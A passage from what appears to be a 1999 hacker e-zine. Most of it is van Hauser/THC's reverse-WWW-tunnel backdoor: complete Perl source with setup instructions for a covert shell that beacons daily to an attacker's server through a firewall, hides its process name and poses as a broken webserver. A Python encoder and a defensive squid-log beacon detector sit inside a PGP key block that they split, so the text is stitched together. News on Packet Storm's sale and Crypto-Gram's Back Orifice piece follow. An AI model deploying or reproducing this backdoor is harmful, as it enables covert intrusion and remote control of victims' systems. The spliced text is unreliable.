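    """uuencode (backtick for zero, like Perl's pack 'u'), 45 bytes per line, then swap."""
    lines = [binascii.b2a_uu(data[i:i + 45], backtick=True).decode("ascii")
             for i in range(0, len(data), 45)]
    return "".join(lines).translate(_TO_SAFE)


def encode(payload: bytes) -> str:
    """What the SLAVE puts after the cgi prefix: token + shell output, encoded."""
    return encode_raw(PASSWORD.encode() + payload)


def decode(blob: str) -> Optional[bytes]:
    """Reverse of encode(); None on malformed data or a wrong token."""
    raw = blob.translate(_FROM_SAFE)
    try:
        data = b"".join(binascii.a2b_uu(line) for line in raw.split("\n") if line)
    except binascii.Error:
        return None
    if not data.startswith(PASSWORD.encode()):
        return None
    return data[len(PASSWORD):]


def slave_request(shell_output: bytes) -> str:
    """Request line the SLAVE sends in the direct (non-proxy) form."""
    return "GET " + CGI_PREFIX + encode(shell_output) + " HTTP/1.0\n"


def decode_request(request_line: str) -> Optional[bytes]:
    """What a defender (or the MASTER) does with a captured request line."""
    start = request_line.find(CGI_PREFIX)
    if start < 0:
        return None
    blob = request_line[start + len(CGI_PREFIX):].split(" ", 1)[0]
    return decode(blob)


if __name__ == "__main__":
    req = slave_request(b"bash$ ")          # constructed shell prompt
    print(req.strip())
    print(decode_request(req))
```

The token check is all that separates a valid request from the "broken webserver" answer the text mentions; since the token travels inside every request in this reversible form, a captured request also yields the token, so the check tells an administrator nothing once he has one sample.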
Example of a connection:

Slave
GET /cgi-bin/order?M5mAejTgZdgYOdgIO0BqFfVYTgjFLdgxEdb1He7krjVAEfg HTTP/1.0

Master replies with
g5mAlfbknz

The GET of the internal host (SLAVE) is just the command prompt of the shell; the answer is an encoded "ls" command from the hacker on the external server (MASTER).

Some gimmicks: The SLAVE tries to connect daily at a specified time to the MASTER if wanted; the child is spawned because if the shell hangs for whatever reason you can check & fix it the next day; if an administrator sees connects to the hacker's server and connects to it himself he will just see a broken webserver, because there's a token (password) in the encoded cgi GET request; WWW proxies (e.g. squid) are supported; the program masks its name in the process listing ... Best of all: master & slave program are just one 260-line perl file ...

Usage is simple: edit rwwwshell.pl for the correct values, execute "rwwwshell.pl slave" on the SLAVE, and just run "rwwwshell.pl" on the MASTER just before it's time for the slave to try to connect.

Well, why code it in perl? a) it was very fast to code, b) it's highly portable and c) I like it. If you want to use it on a system which hasn't got perl installed, search for a similar machine with perl installed, get the a3 compiler from the perl CPAN archives and compile it to a binary. Transfer this to your target machine and run that one.

The code for this nice and easy tool is appended in the section THE CODE after my last words. If you've got updates/ideas/criticism for it drop me an email. If you think this text or program is lame, write me at root@localhost. Check out http://r3wt.base.org for updates.

----[ Security

Now it's an interesting question how to secure a firewall to deny/detect this. It should be clear that you need a tight application gateway firewall with a strict policy.
Email should be handled by a centralized mail server, DNS resolving should only be done on the WWW/FTP proxies, and access to the WWW should only be granted after proxy authentication. However, this is not enough. An attacker can tamper with the mail reader to execute the commands extracted from the encoded X-Headers, or implement the http proxy authentication in the reverse www-shell (it's simple). Also, checking the DNS and WWW logs/caches regularly with good tools can be defeated by switching the external servers every 3-20 calls or by using aliases. A secure solution would be to set up a second network which is connected to the internet, and keep the real one separated - but try telling that to the employees ... A good firewall is a big improvement, and an intrusion detection system can also help. But nothing can stop a dedicated attacker.

----[ Last Words

Have fun hacking/securing the systems ... Greets to all guys who like + know me ;-) and especially to those good chummers I've got, you know who you are.

Ciao...

van Hauser / [THC] - The Hacker's Choice

For further interesting discussions you can email me at vh@reptile.rug.be with my public pgp key below:

Type Bits/KeyID    Date       User ID
pub  2048/CDD6A571 1998/04/27 van Hauser / THC

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.3i

mQENAzVE0A4AAAEIAOzKPhKBDFDyeTvMKQ1xx6781tEdIYgrkrsUEL6VoJ8H8CIU
SeXDuCVu3JlMKITD6nPMFJ/DT0iKHgnHUZGdCQEk/b1YHUYOcig1DPGsg3WeTX7L
XL1M4DwqDvPz5QUQ+U+VHuNOUzgxfcjhHsjJj2qorVZ/T5x4k3U960CMJ11eOVNC
meD/+c6a2FfLZJG0sJ/kIZ9HUkY/dvXDInOJaalQc1mYjkvfcPsSzas4ddiXiDyc
QcKX+HAXIdmT7bjq5+JS6yspnBvIZC55tB7ci2axTjwpkdzJBZIkCoBlWsDXNwyq
s70Lo3H9dcaNt4ubz5OMVIvJHFMCEtIGS83WpXEABRG0J3ZhbiBIYXVzZXIgLyBU
SEMgPHZoQHJlcHRpbGUucnVnLmFjLmJlPokAlQMFEDVE0D7Kb9wCOxiMfQEBvpAD
/3UCDgJs1CNg/zpLhRuUBlYsZ1kimb9cbB/ufL1I4lYM5WMyw+YfGN0p02oY4pVn
CQN6ca5OsqeXHWfn7LxBT3lXEPCckd+vb9LPPCzuDPS/zYnOkUXgUQdPo69B04dl
C9C1YXcZjplYso2q3NYnuc0lu7WVD0qT52snNUDkd19ciQEVAwUQNUTQDhLSBkvN
1qVxAQGRTwgA05OmurXHVByFcvDaBRMhX6pKbTiVKh8HdJa8IdvuqHOcYFZ2L+xZ
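The Security section above names log checking as the defender's lever but gives no concrete test. The following Python is an added example by the editor, not part of van Hauser's article or of rwwwshell; it hunts squid's native access.log format for the pattern a SLAVE with $TIME/$DAILY set leaves behind: one internal client, the same external host and path, a request at the same time of day on several days, and a long query string that is different every time (it carries shell output and, as the text says, is never cached) and has no key=value structure (rwwwshell's character swap removes '='). The log lines, client addresses, host names and thresholds are all constructed.

```python
"""Hunt for reverse-WWW-shell beacons in proxy logs (added example, not THC code).

Works on squid's native access.log:
    timestamp elapsed client action/status bytes method URL ident hierarchy type
Flags (client, host, path) groups that recur at a fixed time of day on several
days with long, never-repeating, key=value-free query strings.
"""
from collections import defaultdict
from datetime import datetime, timezone
from typing import Dict, List, Optional
from urllib.parse import urlsplit

DAY = 86400

# Constructed log lines, not real traffic: 10.0.0.5 runs the slave against
# www.example.net:8080, 10.0.0.7 browses normally (one long search query),
# 10.0.0.9 fetches the same page at the same time daily but with no query.
SAMPLE_LOG = """\
935193663.412    512 10.0.0.5 TCP_MISS/200 310 GET http://www.example.net:8080/cgi-bin/order?QtA3Hn8bkJzPdW2LmR0vYxKc9sGfT1eUqNoB6yZaVhDp4I7XO5wjC - DIRECT/192.0.2.10 text/html
935193690.007     95 10.0.0.9 TCP_MISS/200 4102 GET http://www.example.org/news.html - DIRECT/192.0.2.20 text/html
935226000.118     87 10.0.0.7 TCP_MISS/200 18422 GET http://www.example.com/ - DIRECT/192.0.2.40 text/html
935226031.502     42 10.0.0.7 TCP_HIT/200 5120 GET http://www.example.com/images/logo.gif - NONE/- image/gif
935280081.913    498 10.0.0.5 TCP_MISS/200 298 GET http://www.example.net:8080/cgi-bin/order?Zr7QdLk2MxTcPgN0aYv5HsW9eBjF3oUqRn8IiKhG1tDzV4wXmC6pJ - DIRECT/192.0.2.10 text/html
935280090.221     91 10.0.0.9 TCP_MISS/200 4130 GET http://www.example.org/news.html - DIRECT/192.0.2.20 text/html
935316000.640    130 10.0.0.7 TCP_MISS/200 9211 GET http://search.example.com/q?term=firewall+backdoor+detection+paper+1999&lang=en - DIRECT/192.0.2.30 text/html
935366475.333    507 10.0.0.5 TCP_MISS/200 305 GET http://www.example.net:8080/cgi-bin/order?Kp2WfB9nLdX4zQoR7cGjT0vMaH6sEyU1iNbZ8kDrV3xPtJ5wCqI - DIRECT/192.0.2.10 text/html
935366480.570     89 10.0.0.9 TCP_MISS/200 4098 GET http://www.example.org/news.html - DIRECT/192.0.2.20 text/html
935398800.004     61 10.0.0.7 TCP_MISS/200 17990 GET http://www.example.com/ - DIRECT/192.0.2.40 text/html
"""


def parse_squid_line(line: str) -> Optional[Dict]:
    """Split one native-format line into the fields the hunt needs."""
    f = line.split()
    if len(f) < 7:
        return None
    u = urlsplit(f[6])
    return {"ts": float(f[0]), "client": f[2], "method": f[5],
            "host": u.netloc, "path": u.path, "query": u.query}


def time_of_day(ts: float):
    """(seconds since UTC midnight, UTC date); UTC avoids DST jumps in the window."""
    d = datetime.fromtimestamp(ts, tz=timezone.utc)
    return d.hour * 3600 + d.minute * 60 + d.second, d.date()


def circular_spread(tods: List[int]) -> int:
    """Smallest arc of the 24h clock covering all times (so 23:59 and 00:01 are close)."""
    s = sorted(tods)
    gaps = [b - a for a, b in zip(s, s[1:])] + [s[0] + DAY - s[-1]]
    return DAY - max(gaps)


def hunt_beacons(lines, min_days=3, window=300, min_query=32) -> List[Dict]:
    groups = defaultdict(list)
    for line in lines:
        r = parse_squid_line(line)
        if r and r["method"] == "GET" and len(r["query"]) >= min_query:
            groups[(r["client"], r["host"], r["path"])].append(r)
    alerts = []
    for (client, host, path), reqs in groups.items():
        tods, days = [], set()
        for r in reqs:
            tod, day = time_of_day(r["ts"])
            tods.append(tod)
            days.add(day)
        queries = {r["query"] for r in reqs}
        if len(days) < min_days:               # not (yet) a daily pattern
            continue
        if circular_spread(tods) > window:     # not a fixed $TIME
            continue
        if len(queries) != len(reqs):          # a repeat would be cacheable content
            continue
        if any("=" in q for q in queries):     # key=value: ordinary CGI, not rwwwshell
            continue
        hours, minutes = divmod(sorted(tods)[len(tods) // 2] // 60, 60)
        alerts.append({"client": client, "host": host, "path": path,
                       "days": len(days), "time_utc": "%02d:%02d" % (hours, minutes)})
    return alerts


if __name__ == "__main__":
    for alert in hunt_beacons(SAMPLE_LOG.splitlines()):
        print(alert)
```

The group key (client, host, path) is exactly what the text's countermeasure of rotating external servers every few calls defeats; dropping host and path from the key catches the rotation at the price of more false positives, which is the trade-off to tune against real proxy volume. A SLAVE run with $TIME unset connects at once and leaves no daily rhythm, so for that variant only the query-string tests apply.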
PAQy2WCqeakvss9Xn9I28/PQZ+6TmqWUmG0qgxe5MwkaXWxszKwRsQ8hH+bcppsZ
2/Q3BxSfPege4PPwFWsajnymsnmhdVvvrt69grzJDm+iMK0WR33+RvtgjUj+i22X
lpt5hLHufDatQzukMu4R84M1tbGnUCNF0wICrU4U503yCA4DT/1eMoDXI0BQXmM/
Ygk9bO2Icy+lw1WPodrWmg4TJhdIgxuYlNLIu6TyqDYxjA/c525cBbdqwoE+YvUI
o7CN/bJN0bKg1Y/BMTHEK3mpRLLWxVMRYw==
=MdzX
-----END PGP PUBLIC KEY BLOCK-----

----[ THE CODE

<++> rwwwshell.pl
#!/usr/bin/perl
# Reverse-WWW-Tunnel-Backdoor v1.5
# (c) 1998 by van Hauser / [THC] - The Hacker's Choice
# Check out http://r3wt.base.org for updates
#
# GENERAL CONFIG (except for $MASK, everything must be the same
#                 for MASTER and SLAVE in this section!)
#
$CGI_PREFIX="/cgi-bin/order?";  # should look like cgi. "?" as last char!
$MASK="vi";                     # for masking the program's process name
$PASSWORD="THC";                # anything, nothing you have to remember
                                # (not a real "password" anyway)
#
# MASTER CONFIG (specific for the MASTER)
#
$LISTEN_PORT=8080;              # on which port to listen (80 [needs root] or 8080)
$SERVER="localhost";            # the host to run on (ip/dns) (the SLAVE needs this!)
#
# SLAVE CONFIG (specific for the SLAVE)
#
$SHELL="/bin/sh -i";            # program to execute (e.g. /bin/sh)
$DELAY="3";                     # time to wait for output after your command(s)
$TIME="00:01";                  # time when to connect to the master (unset if now)
$DAILY="sure";                  # tries to connect once daily if set with something
$PROXY="";                      # set this with the Proxy if you must use one
$PROXY_PORT="";                 # set this with the Proxy Port if you must use one
# END OF CONFIG
# nothing for you to do after this point
#
################## BEGIN MAIN CODE ##################
require 5.002;
use Socket;
$|=1;
# next line changes our process name
if ($MASK) {
    for ($a=1;$a<80;$a++){$MASK=$MASK."\000";}
    $0=$MASK;
}
undef $DAILY if (! $TIME);
if ( !($PROXY) || !($PROXY_PORT) ) { undef $PROXY; undef $PROXY_PORT; }
$protocol = getprotobyname('tcp');
if ($ARGV[0] ne "") {
    if ($ARGV[0] eq "-h") {
        print STDOUT "no commandline option : daemon mode\n";
        print STDOUT "using \"-h\" as option : this help\n";
        print STDOUT "any other option : slave mode\n";
        exit(0);
    } else {
        print STDOUT "starting in slave mode\n";
        $SLAVE_MODE = "yeah";
    }
}
if (! $SLAVE_MODE) { &master; } else { &slave; }
# END OF MAIN FUNCTION

############### SLAVE FUNCTION ###############
sub slave {
    $pid = 0;
    if ($PROXY) {               # setting the real config (for Proxy Support)
        $REAL_SERVER = $PROXY;
        $REAL_PORT = $PROXY_PORT;
        $REAL_PREFIX = "GET http://" . $SERVER . ":" . $LISTEN_PORT . $CGI_PREFIX;
    } else {
        $REAL_SERVER = $SERVER;
        $REAL_PORT = $LISTEN_PORT;
        $REAL_PREFIX = "GET " . $CGI_PREFIX;
    }
AGAIN:
    if ($pid) { kill 9, $pid; }
    if ($TIME) {                # wait until the specified $TIME
        $TIME =~ s/^0//;
        $TIME =~ s/:0/:/;
        (undef,$min,$hour,undef,undef,undef,undef,undef,undef) = localtime(time);
        $t=$hour . ":" . $min;
        while ($TIME ne $t) {
            sleep(28);          # every 28 seconds we look at the watch
            (undef,$min,$hour,undef,undef,undef,undef,undef,undef) = localtime(time);
            $t=$hour . ":" .$min;
        }
    }
    if ($DAILY) {               # if we must connect daily, we
        if (fork) {             # fork the daily shell process
            sleep(69);          # to ensure the master control proc.
            goto AGAIN;         # won't get stuck by a fucking cmd
        }                       # the user executed.
    }
    $address = inet_aton($REAL_SERVER) || die "can't resolve server\n";
    $remote = sockaddr_in($REAL_PORT, $address);
    $forked = 0;
GO:
    close(THC);
    socket(THC, &PF_INET, &SOCK_STREAM, $protocol) or die "can't create socket\n";
    setsockopt(THC, SOL_SOCKET, SO_REUSEADDR, 1);
    if (! $forked) {            # fork failed? fuck, let's try again
        pipe R_IN, W_IN;   select W_IN;  $|=1;
        pipe R_OUT, W_OUT; select W_OUT; $|=1;
        $pid = fork;
        if (! defined $pid) {
            close THC; close R_IN; close W_IN; close R_OUT; close W_OUT;
            goto GO;
        }
        $forked = 1;
    }
    if (! $pid) {               # this is the child process (execs $SHELL)
        close R_OUT; close W_IN; close THC;
        open STDIN, "<&R_IN";
        open STDOUT, ">&W_OUT";
        open STDERR, ">&W_OUT";
        exec $SHELL || print W_OUT "couldn't spawn $SHELL\n";
        close R_IN; close W_OUT;
        exit(0);
    } else {                    # this is the parent (data control + network)
        close R_IN;
        sleep($DELAY);          # we wait $DELAY for the commands to complete
        vec($rs, fileno(R_OUT), 1) = 1;
        select($r = $rs, undef, undef, 30);
        sleep(1);
        $output = "";
        vec($ws, fileno(W_OUT), 1) = 1;
        while (select($w = $ws, undef, undef, 1)) {
            read R_OUT, $readout, 1 || last;
            $output = $output . $readout;
        }
        print W_OUT "\000" || goto END;
        while (1) {
            read R_OUT, $readout, 1 || last;
            last if ($readout eq "\000");
            $output = $output . $readout;
        }
        &uuencode;              # does the encoding of the shell output
        $encoded = $REAL_PREFIX . $encoded . "\n";
        connect(THC, $remote) || goto END;      # connect to master
        send (THC, $encoded, 0) || goto END;    # and send data
        $input = "";
        vec($rt, fileno(THC), 1) = 1;           # wait until master sends reply
        while (! select($r = $rt, undef, undef, 0.00001)) {}
        while (1) {             # read until EOD (End Of Data)
            recv (THC, $readin, 1, 0) || goto OK;
            goto OK if (($readin eq "\000") or ($readin eq "\n") or ($readin eq ""));
            $input = $input . $readin;
        }
OK:
        $input =~ s/\n//gs;
        &uudecode;              # decoding the data from the master
        goto END if ( $decoded =~ m/^$PASSWORD/s == 0);
        $decoded =~ s/^$PASSWORD//;
        print W_IN "$decoded" || goto END;      # sending the data
        sleep(1);                               # to the shell proc.
        goto GO;
    }
END:
    kill 9, $pid;
    $pid = 0;
    exit(0);
}
# END OF SLAVE FUNCTION

############### MASTER FUNCTION ###############
sub master {
    socket(THC, &PF_INET, &SOCK_STREAM, $protocol) or die "can't create socket\n";
    setsockopt(THC, SOL_SOCKET, SO_REUSEADDR, 1);
    bind(THC, sockaddr_in($LISTEN_PORT, INADDR_ANY)) || die "can't bind\n";
    listen(THC, 3) || die "can't listen\n";
    # print the HELP
    print STDOUT '
 Welcome to the Reverse-WWW-Tunnel-Backdoor v1.4 by van Hauser / THC ...

 Introduction: Wait for your SLAVE to connect, examine it\'s output and then
 type in your commands to execute on SLAVE. You\'ll have to wait min. the set
 $DELAY seconds before you get the output and can execute the next stuff.
 Use ";" for multiple commands. Trying to execute interactive commands may
 give you headache so beware. Your SLAVE may hang until the daily connect
 try (if set - otherwise you lost). You also shouldn\'t try to view a binary
 data too ;-) "echo bla >> file", "cat >> file <<- EOF", sed etc. are your
 friends if you don\'t like using vi in a delayed line mode ;-)
 To exit this program on any time without doing harm to either MASTER or
 SLAVE just press Control-C.
 Now have fun.
';
YOP:
    print STDOUT "\nWaiting for connect ...";
    $remote=accept (S, THC) || goto YOP;          # get the connection
    ($r_port, $r_slave)=sockaddr_in($remote);     # and print the SLAVE
    $slave=gethostbyaddr($r_slave, AF_INET);      # data.
    $slave="unresolved" if ($slave eq "");
    print STDOUT " connect from $slave/".inet_ntoa($r_slave).":$r_port\n";
    select S; $|=1; select STDOUT; $|=1;
    $input = "";
    vec($socks, fileno(S), 1) = 1;
    while (1) {                 # read the data sent by the slave
        while (! select($r = $socks, undef, undef, 0.00001)) {}
        recv (S, $readin, 80, 0) || print STDOUT "disconnected\n";
        $readin =~ s/\r//g;
        $input = $input . $readin;
        last if ( $input =~ m/\n\n/s );
    }
    &hide_as_broken_webserver if ( $input =~ m/$CGI_PREFIX/s == 0 );
    $input =~ s/^.*($CGI_PREFIX)\??//s;
    $input =~ s/\n.*$//s;
    &uudecode;                  # decoding the data from the slave
    &hide_as_broken_webserver if ( $decoded =~ m/^$PASSWORD/s == 0 );
    $decoded =~ s/^$PASSWORD//s;
    $decoded = "[Warning! No output from remote!]\n>" if ($decoded eq "");
    print STDOUT "$decoded";    # showing the slave output to the user
    $output = <STDIN>;          # and get his input (<STDIN> was stripped from this copy)
    &uuencode;                  # encode the data for the slave
    send (S, $encoded, 0) || die "\nconnection lost!\n";   # and send it
    close (S);
    print STDOUT "sent.\n";
    goto YOP;                   # wait for the next connect from the slave
}
# END OF MASTER FUNCTION

###################### MISC. FUNCTIONS #####################
sub uuencode {  # does the encoding stuff for error-free data transfer via WWW
    $output = $PASSWORD . $output;      # PW is for error checking and
    $uuencoded = pack "u", "$output";   # preventing sysadmins from
    # sending you weird data. The tr swaps uuencode's URL-unfriendly characters
    # for lowercase letters, which uuencode never produces. No real security!
    $uuencoded =~ tr/'\n)=(:;&><,#$*%]!\@"`\\\-'/'zcadefghjklmnopqrstuv'/;
    $uuencoded =~ tr/"'"/'b'/;
    if ( ($PROXY) && ($SLAVE_MODE) ) {  # a proxy drops the request if > 8kb
        $codelength = (length $uuencoded) + (length $REAL_PREFIX) +12;
        $cut_length = 4099 - (length $REAL_PREFIX);
        $uuencoded = pack "a$cut_length", $uuencoded if ($codelength > 4111);
    }
    $encoded = $uuencoded;
    $encoded = $encoded . " HTTP/1.0\n" if ($SLAVE_MODE);
}
# END OF UUENCODE FUNCTION

sub uudecode {  # does the decoding of the data stream
    $input =~ tr/'zcadefghjklmnopqrstuv'/'\n)=(:;&><,#$*%]!\@"`\\\-'/;
    $input =~ tr/'b'/"'"/;
    $decoded = unpack "u", "$input";
}
# END OF UUDECODE FUNCTION

sub hide_as_broken_webserver {  # invalid request -> look like broken server
    # (the HTML tags of this reply were stripped from this copy and are restored here)
    send (S, "\n404 File Not Found\n".
             "\n<HTML><BODY>\n<H1>File Not Found</H1>\n</BODY></HTML>\n\n", 0);
    close S;
    print STDOUT "Warning! Illegal server access!\n";     # report to user
    goto YOP;
}
# END OF HIDE_AS_BROKEN_WEBSERVER FUNCTION
# END OF PROGRAM
# (c) 1998 by
<-->

----[ EOF

--- CUT HERE ---

Ciao...

van Hauser / THC - [The Hacker's Choice]

THC's Webpage -> http://merlin.koeln-net.com/~plasmoid/thc

Type Bits/KeyID    Date       User ID
pub  2048/CDD6A571 1998/04/27 van Hauser / THC

@HWA

08.0 PacketStorm Security Sells Out?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Who's going to pick up the slack now that Ken has removed himself from affiliation with Packet Storm? The following sounds well and good, but will this company (Securify) have the same contacts and receive updates as frequently as Ken used to?
I doubt it... well, it looks like PSS will be relegated to being just an archive of old security tools and exploits. Hopefully the new system will at least do the old one some justice and preserve the layout. Meanwhile we wish Ken Williams the best of luck in his new job, whatever that may be.... - Ed

From HNN http://www.hackernews.com

Packet Storm Moves to Kroll-O'Gara
contributed by jkw

As mentioned in the HNN rumors section last week Ken Williams has sold the rights to Packet Storm Security to Securify, the Information Security Group of The Kroll-O'Gara Company. Ken Williams will no longer be running the site and has accepted a different job within the Information Security industry. Securify hopes to have the site operational and online sometime in September.

Old PSS - With Letter from Ken Williams and Securify Press Release
New PSS
http://www.securify.com/packetstorm/

Late Update
Wow, this made it into the New York Times.

NY Times - Registration Required
http://www.nytimes.com/library/tech/99/08/biztech/articles/17secure.html

August 17, 1999

Security Firm to Revive Computer-Defense Site

By PETER WAYNER

Kroll-O'Gara, the international security consulting firm, said Monday it would take over an Internet site that not only posted information about defending computer systems against attacks but also told how to break into them.

In the shadowy world of hackers and crackers, it is often hard to tell the good guys from the bad. Computer-security experts frequently test systems by breaking into them, and the site, Packet Storm, posted descriptions of those break-ins.

Kroll-O'Gara's computer security unit, Securify, which declined to discuss financial terms of its acquisition, said it planned to maintain the site's tradition of high-quality information as a way to market its services. But Kroll-O'Gara executives said that it would rid the site of its more contentious publications.
"We see it, from a corporate standpoint, as somewhat risky and controversial," Charles Breed, Securify's vice president for marketing, acknowledged. "We'll be publishing a site with very powerful tools and they can be used for good or evil. Our opinion is that it's better to make knowledge available than keeping it obscure or hidden."

Tommy Ward, a project manager at Securify, said three Securify employees would comb through the site, "sanitizing content."

Until late June, Harvard University provided Packet Storm as a service and picked up the costs of answering requests for more than 10 gigabytes of data traffic a day. The site, which was edited by Ken Williams, a security consultant not associated with the university, proved popular with many computer experts because it collected detailed technical information about the methods intruders use to exploit weaknesses in computers. These often-fascinating narratives were mixed with discussions about how to help systems withstand assault.

Harvard dropped the site in late June after the host of a rival site complained that Packet Storm had posted defamatory information. Joe Wrinn, a university spokesman, said, "We're happy that the site will be online again. That's the original reason we got involved."

Williams called the site "a labor of love," but said it was taking 60 to 80 hours a week to maintain. He will not be associated with the site, which will be run by Securify employees at Securify.com. Since Harvard pulled the plug, the site has been inaccessible; computer professionals looked forward to its relaunch, expected in late September.

"I'm glad that the compendium of information is going to be preserved," said Adam Shostack, a computer security consultant.

-=-

Here's the index.html file from the original location of PacketStorm Security with Ken's message and the Securify press release...
-=-

http://www.genocide2600.com/~tattooman/index.html

To The Supporters of Packet Storm Security:

As you may already be aware, there have been numerous rumors on the Net recently regarding the revival of Packet Storm Security through corporate sponsorship. I am pleased to announce that the rumors are indeed true, and that Packet Storm will now be hosted by Securify, the Information Security Group of Kroll-O'Gara.

I have carefully considered the direction and future of PSS since it was taken down by Harvard, and have entertained innumerable offers from a wide variety of corporate, non-profit, and private entities to host the site. Kroll-O'Gara has presented me with the most impressive vision and plans for PSS. Not only does Kroll-O'Gara intend to preserve the original ideals and intent of PSS, but they have developed an exciting and definitive roadmap for the logical evolution of the site.

Packet Storm Security had reached a stage where it was much more than a full time job for one person. For the last year I have been working a minimum of 60 hours a week to maintain the high quality of the site. In order to sustain my vision of PSS as *the* resource on the Internet for freeware Information Security tools, it became necessary to acquire the resources that only a dedicated corporate sponsor could provide. I have talked at length with Matt Barrie (PSS Program Manager) at Kroll-O'Gara ISG, and I believe that they have grand and noble goals for the future of Packet Storm Security.

Unfortunately, I will not be with PSS in the future, however, because I have recently accepted an extremely enticing offer elsewhere in the Information Security industry. I do, nevertheless, give my strongest support to the new maintainers of the site, and I'm excited about what's in store for the future of PSS.

To all of my valued friends and supporters of the site: I sincerely hope that you too will continue through your contributions and suggestions to help make Packet Storm what it was!
Your support has been and will continue to be invaluable in ensuring that PSS is *the* resource for freeware Information Security tools.

Respectfully,

Ken Williams
Founder
Packet Storm Security

********** PRESS RELEASE **********

For more information, contact:

Vicky Wu                         Charles Breed
PR Manager                       VP of Marketing
KVO Public Relations             Securify, Kroll-O'Gara Company
(650) 919-2027                   (650) 812-9400 x107
vicky_ku@kvo.com                 cbreed@securify.com

Matt Barrie
matt@securify.com
packetstorm@securify.com

KROLL-O'GARA INFORMATION SECURITY GROUP ACQUIRES PACKET STORM, THE PREMIER WEB SITE FOR INFORMATION SECURITY TOOLS & DATA

Packet Storm Security is positioned to be the Internet's largest single source for computer security threat information, tools and patches

PALO ALTO, Calif., August 17, 1999 - In response to the growing demand for current and accurate information and tools on computer security, Securify, the Information Security Group of The Kroll-O'Gara Company (Nasdaq: KROG), announced today the acquisition of Packet Storm Security, a website created and maintained by Ken Williams, a renowned computer security expert. Averaging over 400,000 hits per day and generating over 7 gigabytes of traffic, Packet Storm Security is an established resource for many government agencies and major corporations.

"Packet Storm Security provides a strong, long term Internet presence for Securify," states Dr. Taher Elgamal, President of Securify. "It is a state of the art resource for our customers and we see it as the nucleus for a number of exciting additional security management services."

Packet Storm is one of the largest and most well recognized information security resources on the Internet today. The site consists of over 45,000 security related programs, such as up to date tools, patches, advisories, vulnerabilities.
Considering this massive repository of information, Packet Storm Security is the ideal site for finding up-to-date information on the latest threats that face corporate networks and computer systems. This site has been frequented by system administrators, engineers, and programmers from organizations such as AT&T, DoD, NSA, FBI, IBM, Microsoft, GTE, ISS, KPMG, E&Y, InterNIC, Alcatel, NCSC, McAfee, NIST, USAF, Sprint CA, UK Govt., Mitre, Allied Signal, and CitiGroup bank.

"Our customers have asked for a single source data point to inform and educate them on the ever increasing number of information security threats," states Jules Kroll, CEO and Chairman of Kroll-O'Gara Inc. "We will be dedicating a significant effort to making this site extremely useful for anyone involved with computer security."

Packet Storm Security is in the process of being updated and refined prior to being posted in September at http://www.securify.com/packetstorm

# # #

About Securify, the Information Security Group of Kroll-O'Gara

Securify, the Information Security Group of Kroll-O'Gara, is composed of highly regarded industry experts that provide objective information security services to businesses and government agencies. These services include network and system security review and repair, product assessment, the creation and implementation of secure e-commerce sites, architecture and design. They also employ internally developed proprietary software that combines best-of-breed security tools and client information to analyze and assess network security issues as a scientific discipline. Their approach employs standard, well-tested methodology, and treats security as both a business and a technical issue. The Information Security Group is unique in the security field in that it not only provides the assessment and recommendations, but also actual implementation and deployment.

For more information, please access their web site at www.securify.com, or contact the company at (650) 812-9400.
Contact Vicki Wu of KVO Public Relations at (650) 919-2027.

About The Kroll-O'Gara Company

The Kroll-O'Gara Company is a leading global provider of a broad range of specialized products and services designed to supply solutions to a variety of security needs. Kroll-O'Gara provides governments, business, and individuals with information, analysis, training, and products to mitigate the growing risks associated with white-collar crimes, fraud, physical attacks, threats of violence, and uninformed decisions based upon incomplete or inaccurate information. The company is organized into four primary business groups: Investigations & Intelligence Group, Security Products & Services Group, Voice and Data Security Group, and the Information Security Group. Based in New York City, New York, and Fairfield, Ohio, Kroll-O'Gara employs more than 2,600 people in 60 offices and plants around the world. For more information, please access the company's web sites at www.securify.com or www.kroll-ogara.com.

@HWA

09.0 CryptoGram Aug 15th '99
~~~~~~~~~~~~~~~~~~~~~~~

From: Bruce Schneier

CRYPTO-GRAM

August 15, 1999

by Bruce Schneier
Founder and CTO
Counterpane Internet Security, Inc.
schneier@counterpane.com
http://www.counterpane.com

A free monthly newsletter providing summaries, analyses, insights, and commentaries on cryptography and computer security.

Back issues are available at http://www.counterpane.com. To subscribe or unsubscribe, see below.

Copyright (c) 1999 by Bruce Schneier

CRYPTO-GRAM now has over 20,000 subscribers!

** *** ***** ******* *********** *************

In this issue:
      Back Orifice 2000
      Counterpane -- Featured Research
      News
      Counterpane Systems News
      NIST AES News
      The Doghouse: HPUX and the UNIX Crypt Algorithm
      Web-Based Encrypted E-Mail
      Comments from Readers

** *** ***** ******* *********** *************

Back Orifice 2000

Back Orifice is a free remote administration tool for Microsoft Windows. It's also one of the coolest hacking tools ever developed.
Originally released last July, Back Orifice 2000 (BO2K) is the current release of the software. It works on Windows 95, Windows 98, and Windows NT. It is much better written than the original Back Orifice. And it's free, and open source.

There are two parts: a client and a server. The server is installed on the target machine. The client, residing on another machine anywhere on the Internet, can now take control of the server.

This is actually a legitimate requirement. Perfectly respectable programs, like pcAnywhere or Microsoft's own Systems Management Server (SMS), do the same thing. They allow a network administrator to remotely troubleshoot a computer. They allow a remote tech support person to diagnose problems. They are mandatory in many corporate computing environments.

Remote administration tools also have a dark side. If the server is installed on a computer without the knowledge or consent of its owner, the client can effectively "own" the victim's PC.

Back Orifice's difference is primarily marketing spin. Since it is not distributed by a respectable company, it cannot be trusted. Since it was written by hackers, it is evil. Since its malicious uses are talked about more, its benevolent uses are ignored. That's wrong; pcAnywhere is just as much an evil hacking tool as Back Orifice.

Well, not exactly. Back Orifice was designed by a bunch of hackers with fun in mind. Not only can the client perform normal administration functions on the server's computer -- upload and download files, delete files, run programs, change configurations, take control of the keyboard and mouse, see whatever is on the server's screen -- but it can also do more subversive things: reboot the computer, display arbitrary dialog boxes, turn the microphone or camera on and off, capture keystrokes (and passwords). And there is an extensible plug-in language for others to write modules. (I'm waiting for someone to write a module that automatically sniffs for, and records, PGP private keys.)

Back Orifice is also designed to hide itself from the server's owner. Unless the server's owner is knowledgeable (and suspicious), he will never know that Back Orifice is running on his computer. (Other remote administration tools, even SMS, also have stealth modes; Back Orifice is just better at it.) Anti-virus software has been updated to detect default Back Orifice configurations, but that will only solve most of the problem. Because Back Orifice is configurable, because it can be downloaded in source form and then recompiled to look different...I doubt that all variants will ever be discovered.

